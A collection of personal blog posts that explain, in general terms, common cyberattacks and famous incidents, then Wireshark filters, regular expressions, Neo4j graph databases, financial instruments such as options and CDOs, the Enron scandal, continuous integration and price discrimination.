Common Exploits and How They Work

Man in the Middle: "an attack where the attacker secretly relays and possibly alters the communications between two parties who believe they are directly communicating with each other."-Wkipedia.

A MITM or MTM attack does not happen at the source or destination but rather along the route between them. To prevent this type of attack one must ensure the integrity of their network. This includes enabling only the latest recommended security protocols, ensuring SSL cannot be impersonated, and general configuration of network firewalls and routing equipment to ensure no unauthorized user can ever connect to your router or any other interception point.


SQL Injection: "An SQL injection is a computer attack in which malicious code is embedded in a poorly-designed application and then passed to the backend database. The malicious data then produces database query results or actions that should never have been executed." -Techopedia.com

Image result for SQL Injection



Cross-site Scripting (XSS): "XSS enables attackers to inject client-side scripts into web pages viewed by other users." -Wikipedia




For a basic example, if UserA is logged into some secure that is authenticating each UserA HttpRequest via a key that UserX can obtain- (perhaps by successfully MITM'ing)- UserX can then impersonate User A by using UserA's authentication key to craft HttpRequests containing malicious scripts that run automatically on User A's browser.



Buffer Overflow Attack:

Image result for buffer overflow attack

Buffer Overflow attacks cause a memory buffer boundary (stack or heap) to be exceeded and memory pointers to be overwritten to point to attackers own malicious functions instead of the normal user, machine or OS instructions.

Intrusion detection systems can be used to mitigate this type of attack by alerting Network Administrators if any irregular/bad actor is on the network. Some well-known buffer overflow attacks: https://www.cypressdatadefense.com/education-training/buffer-overflow-attacks-need-know/


Rootkit Deployment: "A rootkit is a clandestine computer program designed to provide continued privileged access to a computer while actively hiding its presence." -Veracode.com

The unique feature of rootkits is their design to be undetectable. In Windows systems for instance, rootkits will override Win32 API methods that the OS uses to verify the integrity and authorization of certain method calls, etc. In this way, rootkits can allow a malicious program to run in the background, undetected by most normal system checks. Sysinternals' RootKitRevealer can show you if your machine is affected by any rootkit-based malware.

Image result for RootKit



The following are some of the more well-known Exploits:

StuxNet: Uncovered in 2010, this severely malicious virus spread through Windows USB "Autorun" feature and mostly affected an Iranian nuclear enrichment plant. StuxNet was a self-propagating worm hidden via root level masking. The machine operators had no forewarning that StuxNet was installed and configured to ruin several centrifuges. StuxNet was developed jointly by US and Israeli cyber actors. Shockingly, the Iran centrifuge destruction was "just a test" of StuxNet's power. It successfully stalled Iran's nuclear enrichment program for up to several years according to NY Times researchers: https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html


WannaCry: "The WannaCry ransomware attack was a May 2017 worldwide cyberattack by the WannaCry ransomware cryptoworm, which targeted computers running the Microsoft Windows operating system by encrypting data and demanding ransom payments in the Bitcoin cryptocurrency." - Wikipedia 

WannaCry affected a number of targets (and successfully extorted a number of ransoms) including Britain's National Health Institute.


Sony Music: Sony's privates network was compromised by a group calling themselves "Guardians of Peace". The attack apparently happened simply from one of the attackers obtaining admin credentials through email phishing. Embarrassing internal email correspondence and future film material was leaked to the public. Ultimately, North Korean Park Jing Hyok has been charged for the Sony attack as well as the WannaCry ransom attack: https://www.pbs.org/newshour/nation/north-korean-programmer-charged-in-sony-hack-wannacry-attack


Spectre: In 2018 this hardware-based attack method altered the way microprocessors perform a  basic branch speculation function which leads to side effects that include revelations of what was in the process instruction, private data, etc. Although this attack is not remotely exploitable, it is likely to go undetected unless systems are maintained and secured diligently.



Cybersecurity Organizations and Resources:

OWASP Free and Open Security Community

Offensive Security

Microsoft Security

Android Security

Linux Security

Useful Wireshark Filters, Tips

Wireshark is a network traffic (packet) analyzer that is used for troubleshooting network issues and debugging applications at the network layer. With Wireshark you can usually isolate the device or communication link responsible for abnormal behavior in a network-based application.

Wireshark's UI can tell you a plethora of information about packets and their relationships; the key is isolate the WS info you need to solve your specific problem

The following are some of Wireshark's more useful tools for developers looking to get close inspection on network communications and data/packet movement:

Search for strings in packets: frame contains "local"

Display Filter reference: https://wiki.wireshark.org/DisplayFilters

Display Filter with Regex: frame matches "[B@]\w+" && frame.len < 55

Analyze existing pcaps: https://www.netresec.com/?page=PcapFiles

Follow Streams: Right-click packet and select "Follow" to isolate conversations.

Filler for only your IP: Filter only your local IP for src or dest to isolate your machine's traffic if you are on a switch.

Bad TCP setup: https://www.davidsudjiman.info/2018/02/08/capturing-bad-tcp-packets/

Regular Expressions

Regular expressions are a strings of (regex) code and matching (character) references used for finding patterns of characters within some defined contiguous string of characters (ie. forms validation, an IDE identifying opening and closing tags in markup code or a terminating semicolon in Java/C#). A more official definition describes regex as:
"In computing, regular expressions provide a concise and flexible means for identifying strings of text of interest, such as particular characters, words, or patterns of characters. Regular expressions (abbreviated as regex or regexp, with plural forms regexes, regexps, or regexen) are written in a formal language that can be interpreted by a regular expression processor, a program that either serves as a parser generator or examines text and identifies parts that match the provided specification."

 This diagram breaks down the gist of how an expression works- see the reference below for full list of matching modifiers and syntax

Having more than a passing familiarity with regex can be a tremendous help when doing any kind of development related to the identification of patterns in character/symbol data. When you understand how each component works you can very easily begin to build your own expressions to suit your particular application's pattern matching needs.

Below are some common regular expressions:

Alphanumeric Strings and Chars
^\w+$

Username (16 characters)
/^[a-z0-9_-]{3,16}$/

Hexadecimal ID
/^#?([a-f0-9]{6}|[a-f0-9]{3})$/

Email
/^([a-z0-9_\.-]+)@([\da-z\.-]+)\.([a-z\.]{2,6})$/

URL
/^(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\/\w \.-]*)*\/?$/

ipV4 Address
/^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/

HTML Tag
/^<([a-z]+)([^<]+)*(?:>(.*)<\/\1>|\s+\/>)$/

XML Tags
Don't use Regex, use something like XPath


Just remember that the brackets are regex matching patterns, the curly braces are index positioners, the parens surround regex "capture groups" and the other syntax denotes flags for how much to match and other special conditions to be applied to the match/regex expression. Go here to practice and learn more: https://regexr.com/


The above illustrates Regex in 2 Capture Groups, One for alpha chars and the other for numeric chars


Reference: https://code.tutsplus.com/tutorials/8-regular-expressions-you-should-know--net-6149

Neo4j Graphs: Creating and Querying Edges and Nodes

First it is helpful to understand the basic premise behind Graph Theory, which is the foundation of these "Pairwise relations between objects" that we can store and explore in graph databases. The mathematical representation is the formula:

A graph (G) is equal to the connections of its entity nodes aka "vertices" (V) with its relationship edges (E)


Swiss mathematician Leonhard Eueler was looking for a solution to a puzzle on the relationships between land masses and bridges in the Prussian city of Konigsberg. This was the genesis of Graph Theory:

"The geometry of position, now known as Graph theory"

Graph database technology is useful for analyzing complex relationships and relationship behaviors in myriad scenarios not limited to:
  • Computer Networking
  • Spread of Gossip
  • Fraud Detection
  • Forensic Investigations
  • Flight Mapping/GPS
  • Population Growth
  • Spread of Infectious Disease
  • Hierarchy Visualization

It is also vital component for the analysis of (increasingly) unstructured data. By unstructured we typically mean data that is not easily modeled in a traditional relational hierarchy but may still have common properties and so still have relationship value. It is estimated that around 80-90% of an organization's data is unstructured.

Example of a couple simple graph relationships

Relationships in graph data are formed by the edge tables which signify a relationship between two different entities or "nodes" which are stored in node tables. Instead of RDBMS FK/PK and other check constraints, the relationships are defined in the edge tables; all of the properties that one would want to query via CQL to find things are stored in JSON metadata inside the node tables instead of the columns-for-each-property that defines relational data architecture.

Node Tables: Represent a data entity

Edge Tables: Store relationships between nodes

For the RDBMS purists and skeptics out there, I recommend this quote about Node, Graph and other alternative data processing paradigms vs. the traditional RDBMS OLTP and OLAP models:
"The NOSQL acronym is: Not Only S Q L. NOSQL solutions are not a replacement or successor for RDMBS systems, nor were they ever intended to be. They are useful tools to be used for specific purposes. They are to be used as part of an organisation’s data management solution and not as a total replacement for the existing solution". -Simon Munro
It is important to note that graph data can be queried in much the same way as SQL through a graph-specific query language called CQL (cipher query language) as you will see in the following demonstration.

For a quick demonstration on how easy it is to get up and running with this technology we will be using Neo4j which you can download here: https://neo4j.com/download/


Walkthrough of Neo4j:
Fire up the Neo4j Desktop client, click "New" and then click the "Add Graph" button to create your first graph database. Once the db has been created, click the play icon to start it up (it must be running for Neo4j browser to connect).

This is the Neo4j main home screen from which you can create and connect to graph databases and projects

Then click the "Neo4j Browser" button to launch the graph data browser for creation and visual exploration of graph data relationships.

Next, in the Neo4j browser, click "Jump into Code" and simply follow the prompts to begin creation and querying of graph data.

Once, in the Neo4j tutorial, you can simply follow the prompted instruction widgets.

I would continue with instructions but the rest is refreshingly self-explanatory. You first create a movie database that contains actors, directors and movies stored in Node (entity) tables and the types of relationships between these Nodes stored in Edge (relationship type) tables.

One thing to note is that to execute a CQL command in the browser, you must hold down CTRL+Enter. Alternatively you can click the play button to execute CQL.

As you continue with the tutorial you will wind up with something like this when you get to the step that has you execute CQL to find all Node entities that are within 4 degrees (or node "hops") of the actor Kevin Bacon:

4 degrees of separation from Kevin Bacon...

Once you get comfortable with CQL syntax it is relatively easy to start modeling and creating your own graph database structures which can help you and/or your company to analyze some of the unstructured and semi-structured data that is hard to extract value from with traditional RDBMS.

Bigtime kudos to the Neo4j team on making this so straightforward and simple to learn and get up
and running with a new technology so fast. I've never seen a technology tutorial like it.

As you can see, there is tremendous potential value in exploring data relationships that don't necessarily fit neatly into traditional RDBMS/hierarchical databases but are no less useful a tool to have in an organization's data analysis arsenal.


References:

https://www.mssqltips.com/sqlservertip/5007/sql-server-2017-graph-database-query-examples/

https://www.youtube.com/watch?v=gXgEDyodOJU

https://www.red-gate.com/simple-talk/sql/t-sql-programming/experiments-with-neo4j-using-a-graph-database-as-a-sql-server-metadata-hub/

https://www.youtube.com/watch?v=mVWn8k49mAQ

Securitization

Securitization is the creation and sale of pieces of debt from a pool of similar debt assets. It is a way for banks to take a group of home mortgage loans for instance, and cut the asset group into pieces or "tranches" that can be sold as MBSs (mortgage backed securities) on the open market.


Lots of touch points in this interesting "value abstraction" process

While many investment banks who used this financial implement in the run-up to the Great Recession have been strongly criticized for not vetting assets thoroughly enough in the origination process, the process of securitization will always be a method for asset holders to convert an illiquid asset like a group of home mortgages or consumer credit card debt into something (or rather "some things") that can be more easily packaged, bought and sold on the open market.


Reference: https://blog.bankex.org/paving-the-way-from-securitization-to-tokenization-ac0187ba6d48


Options, Calls and Puts

In finance, an option is a contract which gives the buyer the right, but not the obligation, to buy or sell an underlying asset at a specified price prior to or on a specified date, known as the "expiry date". An option contract typically requires an upfront payment for the option, called the premium.

A call option, also referred to as a "call" in finance jargon, gives the buyer the right to buy the underlying asset at an agreed-upon price on a specific date or within a specified period of time.

A put option, also referred to as a "put", gives the buyer the right to sell the underlying asset at an agreed-upon price on a specific date or within a specified period of time.

Calls give the right to buy, puts give the right to sell

The important characteristic of options contracts is that they give the right- not the obligation- to buy or sell an asset at some agreed upon price on or before the option's contract expiration date. The option holder can simply walk away from the option to buy or sell if she or he decides it is no longer in their best interest.

Options are another asset class, and when used correctly, they offer many advantages that trading stocks and ETFs alone cannot (namely the ability to decide not to exercise the option if the value of the underlying asset being bought or sold changes significantly (in the wrong direction) for the option holder before the expiry date, for instance).

Options are different from futures contracts in that option contracts give the right to buy or sell on or before some date, while futures contracts represent an obligation to buy or sell on some date.

With options, financial traders can lock in future gains if an asset value is expected to (and does) rise in value above their call price, and conversely can stem future losses if an asset value is expected to (and does) drop in value below their put price.


References:

https://investinganswers.com/financial-dictionary/optionsderivatives/option-2049

https://www.fool.com/investing/options/options-the-basics.aspx


The Infamous Story of ENRON

The story of Enron is a story of greed and how a Houston-based energy company rocketed to the top echelon of Corporate America before losing everything.

From stodgy Oil & Gas merger, to high-flying corporate giant, to an astonishing demise

Formed from the merger of Houston Natural Gas and InterNorth in 1985, Enron began with humble roots. Kenneth Lay was an enterprising economics graduate from Missouri who learned the ropes of the oil and gas business early while obtaining his PhD in economics in 1970 and working his way up to management at InterNorth before it was purchased by HNG.

For years the company had solid (if not spectacular) results and even overcame a couple near-fatal financial disasters that resulted from oil futures and origination guarantees deals gone bad. An almost overly-proud Harvard MBA from Illinois, Jeff Skilling joined Enron's ranks after several years of consulting for the energy giant as part of Enron's cozy relationship with McKinsey and Company.

Enron's fatal flaw was the belief that accounting "creativity" can permanently hide fraud 

In time, Skilling became COO and began to call for the mass hiring of elite MBA types and math gurus which he transformed into his "complex deal making" army. He became particularly close with Enron's oddball finance and accounting veteran Andrew Fastow who paired the brains of Jeff's army with the creativity of accounting fraud to make Enron appear, at least to investors and banks, as an extravagant capital-generating machine.

Fastow and his crack team of corporate fraudsters developed a network of shell companies known as SPEs or "special purpose entities" and used these as vehicles for hiding losses and booking fictitious deals- to the tune of several billion dollars of imaginary capital and unreported losses. Quarter after quarter, when Enron divisions were struggling to "hit the numbers" that Wall Street analysts expected- Andy would step in to save the day with his SPE magic that- at least temporarily- made bad news go away.

Another favorite method of Fastow and Skilling was to use "mark to market" accounting treatment of their energy deals. Meaning that they reported- as current income- all estimated future income of the life of the deal- for virtually all the deals they did. This is great when things are going good but it is an obviously untenable situation. While Enron was flashing the gaudy mark to market income figures to the Street, the future required them to actually service those deals- and never book another accounting profit as the entire deal's income has already been reported.

Enron's pursuit of Wall Street's favor made a mockery of their Code of Ethics

Enron, which had once been a company with deep roots in Oil & Gas and was hands-on in developing pipelines and sourcing fossil fuels for delivery contracts, was now in the business of trading on energy futures that bore little to no resemblance to true tangible "present values". Everything was speculation. Everything was reduced to hedges and bets. Nothing was real anymore. And it all collapsed under the weight of its own obfuscation.

Sure there were other reasons Enron collapsed. There was the comical Enron Broadband Services which tried to take on the early internet giants like AOL, and went..... nowhere. There were notorious global deals in places like India and England that became financial albatrosses which only Fastow's shell games could attempt to mask- for a time. But it was really just simple greed and criminal accounting.

Jeff Skilling Harvard MBA abstract mastermind, avoider of details and implementation

Even the once-proud accounting firm Arthur Anderson would be brought down by the fall of Enron and eventually file for bankruptcy. They had some protestations early on about the use of SPEs and the anachronistic manner of applying profits and losses, but ultimately they went along with and signed off on the grossly improper financial reporting.

The Justice Department, the SEC and FBI had long been looking at the company by the time Enron's offices were raided on January 22nd, 2002. What followed was the trial and conviction of several Enron executives including Fastow, Skilling and Lay who were sentenced for an assortment of fraud and conspiracy charges related to the heart of the scandal.

Andy Fastow was given a reduced 6 year sentence after agreeing to cooperate and testify against his former bosses. He was released from prison in 2011 and is now a popular speaker at business ethics and accounting fraud conferences.

Skilling received 24 years in federal prison for his role. He was released to a Texas half-way house on August 30th of 2018.

Ken Lay died of a heart attack while awaiting sentencing.

The biggest losers of Enron's demise were Enron employees and common stockholders who bet big on Enron's future

The timeline, web of deceit and cast of characters in this tragedy is truly fascinating. Rebecca Mark, Ken Rice, Lou Pai, and so many more interesting personalities are woven into this spectacular story that is told best by the people who (literally) wrote the book. For a comprehensive look into this business debacle, the award-winning book and documentary can be found here:

The Smartest Guys in the Room book by Bethany McLean and Peter Elkind

ENRON: The Smartest Guys in the Room

In the end, this was a tragedy of obscene hubris and ultimate humility. The ironic thing is that they had a solid business model and were it not for the lies that enabled inflated financial reporting, Enron- albeit a smaller and less glamorous Enron- would likely still be in business today.

Capital Gains (Losses) and Capital Gains Tax

Capital gains are often thought of in the context of profiting from the sale of some stock or other security-based financial product. Capital losses on the other hand, are the opposite (the loss incurred from the sale of stock). It is important to remember however, that capital gains and capital losses can also include other sales such as the sale of a vehicle, the sale of a home, the sale of an antique, etc.



Capital gains tax is paid by sellers (both businesses and consumers) who have profited from the sale of some asset (bonds, stocks in other businesses, company equipment that was sold for profit). 

Capital loss occurs when an asset is sold for less than was purchased. The amount of this sale is usually exempt (deductible) from taxes up to a certain amount.



Commodities and Securities Futures

"A futures contract is an agreement to buy or sell an asset at a future date at an agreed-upon price"

Futures markets such as the New York Board of Trade and the Chicago Mercantile Exchange facilitate the trading of futures contracts. Futures trading is often thought of only as raw materials (commodities), however financial products or "securities" are also traded in futures markets:

Commodities: A commodity is a raw material that has value and is more or less in constant demand (think- milk, eggs, pork, beef, chicken, lumber, iron, salt, crude oil, coal, etc.).

Securities (Financial): A security is a financial product such as an interest rate, the price of a stock, the value of some kind of debt like CDOs.

A recent history of returns on commodities futures by year and type


Futures trading is simply buyers betting on the future value of some product from the sellers. In commodities this could be a day trader speculating that the price of oil is about to skyrocket and buying contracts for purchases of oil at a lower price (he/she hopes).

Remember that futures trading is not limited to commodities

In securities futures, an example would be a buyer entering a contractual agreement to purchase some amount of stock for an agreed upon price at some future date. This would be to the buyer's advantage only if the price of the stock price on the future date is higher than the price agreed to in the futures contract.

At the heart of this kind of trading (and one could argue all trading) is the idea of betting for (+) or hedging against (-) the inevitable fluctuation of future value.


Reference: https://finance.zacks.com/futures-vs-commodities-5663.html

Continuous Integration

"Continuous Integration (CI) is a development practice that requires developers to integrate code into a shared repository several times a day. Each check-in is then verified by an automated build, allowing teams to detect problems early."




The idea behind CI is that by having all developers continuously tracking (pulling down changes from)- and incrementally integrating their branch/feature code into- a "master" branch (or some common branch that facilitates CI of all other branches), problems that stem from incompatible or "not easily merge-able" features surface at the first detection of incompatibility, as opposed to at the end of feature branch development when any incompatibilities are magnified, and result in time-consuming redesign efforts to make things merge and interoperate cleanly.

In short, CI is used to nip potential integration problems in the bud.

Dividends


Dividends are a company's optional distribution of (typically) cash to stockholders and provide another way to earn money from investing beyond growing the value of one's portfolio.


A dividend is defined as "a sum of money paid regularly (typically quarterly) by a company to its shareholders out of its profits (or reserves)".

A dividend yield is an expression of the dividend amount relative to the company's current share price. You can calculate the current dividend yield for a given year by dividing the total dividend paid for that year or the following year (or any 12 month period) by the current stock price.

Some companies regularly pay out a cash dividend and can make their stock more attractive by doing so. Johnson Controls (JCI) for instance, has managed to pay a quarterly dividend every year since 1887. They paid a total dividend of $1.04 in 2018 and the stock price as of today is $31.21.




There are two ways to calculate a company's current dividend yield: (1) by using what are called "forward dividends" or (2) by using "trailing dividends". Trailing uses the preceeding 12 months while forward uses the expected payouts in the proceeding 12 months. As of today (1/2/2019) using trailing dividends, or to be more clear- in relation to their 2018 total dividend payout"- JCI's dividend yield was:

$1.04 / $31.21

...or 3.3%.


As you can see from the charts above, General Electric and Honeywell have paid out cash dividends consistently for years. But GE has recently clawed back these payouts dramatically. This is probably due to GE's ongoing restructuring and spin-off efforts.

Reference:

https://www.nasdaq.com/symbol/jci/dividend-history


Collateralized Debt Obligations (CDOs)

Collateralized Debt Obligations are units of packaged debt, sometimes referred to as "Frankenstein debt" which consists of various kinds of debt obligations (auto, home, credit card, student loans, corporate debt, etc.) of various credit ratings (AAA, AA, A, BBB, BB, B, CCC, CC, etc.).

"Originally developed as instruments for the corporate debt markets, after 2002 CDOs became vehicles for refinancing mortgage-backed securities." -Wikipedia


The idea behind this type of investment is that although it contains lots of high-risk debt (that may well default), that risk is offset by the better rated debt in the CDO package.

There are also CDOs known as "CDOs squared". These are also simply packages of variously rated debt, but with an additional layer of abstraction (obfuscation). Instead of various cash-backed assets and other kinds of direct claims on debt in the bundle, CDO^2 consist of pieces or "tranches" of other CDOs.

Additionally, there are Synthetic CDOs and CDSs. A Synthetic CDO is not backed by debt assets but rather derivatives of debt assets known as "Credit Default Swaps" (CDSs), which are basically CDO insurance. The buyer of a CDS makes periodic premium payments in much the same way as premiums for home and auto insurance.

CDSs provide a way for investors to hedge CDO investments. If a credit event (default on a CDO's underlying debt asset) occurs, the buyer of a credit default swap is protected from losses. If no credit event occurs, the seller of the CDS continues to collect the premium payments for the duration of the term of the CDS.

Crazy stuff, huh? Be careful, Wall Street.. Lehman Brothers never saw it coming... 😶

2008 was obviously the wake-up call, trillions in wealth vanished as values crashed to Earth

Price Discrimination

Price Discrimination is the act of selling the same product or service at different prices to different buyers in order to match differing levels of demand. It is used to ensure business from lower demand markets and earn the maximum possible profit from higher demand markets. This can be illustrated in the case of your grandparent or child getting a discount at the movie theater because they tend to have a lower demand than the average moviegoer.

Examples of Price Discrimination

"Price Equilibrium" (PE) is the price point at which a Supply Curve and Demand Curve intersect. Any price charged above the PE will result in more profit (seller surplus) and any price below PE will result in less profit (consumer surplus, missed opportunity by seller). Pricing products and services is done through the process known as Marginal Cost Analysis.

Price discrimination can be quite problematic when it is applied on the basis of ethnicity or socioeconomic status.

Just a matter of risk data? Or a racially biased algorithm used by banks?

Although the discriminatory practice known as "redlining" has been outlawed for over 50 years, banks continue to charge higher mortgage rates to non-white consumers. From the bank's perspective they would argue that it is coincidence and simply reflects the consumer's credit and a higher risk they are taking on. Others would argue that minority loan-seekers are being priced out of the American Dream because of the color of their skin.

Gas stations tend to have higher-than-average prices in low income areas because the customers in these areas have less nearby options, are often less mobile and are in general less discriminating than shoppers in a wealthy suburb who can leverage their environment of more competition, their mobility and in turn be more selective in their consuming habits (which is to say, more likely to sharply increase or decrease demand if a price is not in equilibrium).


Now in some cases price discrimination makes perfect sense. Take for example a hardware store in Arizona and a hardware store in Wisconsin who are both selling snowblowers. The store in Arizona is almost assuredly going to sell their snowblowers for far less as the demand for snowblowers is very low in that area of the country.

But in Wisconsin, there is virtually year-round demand as it snows every year, and so the Wisconsin store is likely to charge much more than the Arizona store. Furthermore, even within Wisconsin, stores will charge less for snowblowers in the summer than in the winter (when demand is higher).

Companies differentiate prices to match demand for different types of consumers

With the exception of 4th degree price discrimination, when a price is different for different types of consumption of the same product or service- it is because demand for that product or service is different among consumers and so companies set the prices accordingly.